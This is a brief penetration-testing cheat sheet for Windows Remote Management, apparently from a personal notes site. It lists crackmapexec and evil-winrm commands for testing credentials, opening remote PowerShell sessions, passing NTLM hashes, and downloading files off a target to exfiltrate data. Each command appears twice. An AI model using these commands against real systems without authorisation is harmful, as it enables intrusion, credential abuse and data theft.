My personal favorite
Check: crackmapexec --verbose winrm <IP> -u <username> -p <password>
crackmapexec --verbose winrm <IP> -u <username> -p <password>
Try both ports: evil-winrm -i <IP> -u <username> -p <password> -p <port>
evil-winrm -i <IP> -u <username> -p <password> -p <port>
Powershell session: evil-winrm -i <IP> -u <username> -p <password>
evil-winrm -i <IP> -u <username> -p <password>
Pass the hash (NTLM): evil-winrm -i <IP> -u <username> -H <hash>
evil-winrm -i <IP> -u <username> -H <hash>
Exfil data using Evil-winrm: download <File to be exfiltrated location> <Local location where it should be exfiltrated>
download <File to be exfiltrated location> <Local location where it should be exfiltrated>
Last updated 2 years ago